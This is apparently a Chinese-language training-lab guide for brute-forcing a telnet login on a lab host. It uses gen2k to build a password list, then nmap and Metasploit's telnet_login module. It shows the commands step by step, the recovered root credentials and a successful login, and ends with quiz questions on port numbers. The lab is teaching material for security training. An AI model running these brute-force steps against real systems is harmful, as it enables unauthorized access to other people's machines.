Metasploit批量验证爆破telnet
目录 【学习提示】【实验目的】【实验原理】【实验环境】【实验步骤】一、利用gen2k工具生成密码表二、利用Metasploit暴破目标主机telnet服务【实验思考】目录【学习提示】1. 在“桌面环境”中按指导书提示动手练习。2. 在指导书上方“问答”中提出问题,或“共享桌面”寻求远程帮助。3. 在指导书底部“实验思考”中完成作业,作业完成且答案正确本课程学习结束,可发表评论。4. 学习中遇到疑难问题,可通过指导书上方“问答”功能提出,本课程老师会及时予以答疑。
【实验目的】1) 使用枚举的方法破解telnet登陆密码。
【实验原理】1) 利用gen2k工具,根据收集来的信息,自动生成密码,使用枚举的方法破解telnet登陆密码。
【实验环境】
【实验步骤】一、利用gen2k工具生成密码表1.1 使用gen2k工具生成密码表。单击桌面空白处,右键菜单选择“在终端中打开”。如图1所示
图1
1.2 在终端中输入命令“cd /home”,进入软件目录,在终端中输入命令“more user.txt”,查看已收集到的关键词文件“user.txt”,利用此文件生成对应的密码。如图2所示
图2
1.3 在终端中输入命令“python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt”,生成密码文件passwd.txt,在终端下输入命令“more passwd.txt”,查看生成的内容。如图3所示
图3
二、利用Metasploit暴破目标主机telnet服务2.1 在终端中输入命令“nmap –sV 192.168.1.3”,扫描目标主机,发现目标主机开启telnet服务。如图4所示
图4
2.2 在终端中输入命令“msfconsole”,启动MSF终端。如图5所示
图5
2.3 在终端中输入命令“search telnet”,搜索telnet的相关工具和攻击载荷。如图6所示
图6
2.4 在终端中输入命令“use auxiliary/scanner/telnet/telnet_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下。如图7所示
图7
2.5 在终端中输入命令“set RHOSTS 192.168.1.3”,设置目标主机的IP地址。如图8所示
图8
2.6 在终端中输入命令“set PASS_FILE /home/passwd.txt”,爆破时使用的密码文件为passwd.txt。如图9所示
图9
2.7 在终端中输入命令“set USER_FILE /home/user.txt”,爆破时使用的用户名文件为user.txt。如图10所示
图10
2.8 在终端中输入“exploit 192.168.1.3”, 对目标主机进行暴力破解。如图11所示
图11
2.9 在终端中显示成功对目标主机的telnet服务进行了破解,账号为root,密码:Simplexue123。如图12所示
图12
2.10 在终端中输入“telnet 192.168.1.3 ”,输入获取的账号root和密码Simplexue123,连接成功。如图13所示
图13
【实验思考】1.telnet对应的操作系统端口号是哪个?
题目一 以下哪个是mysql的端口号()A: 111B: 520C: 1036D: 3306
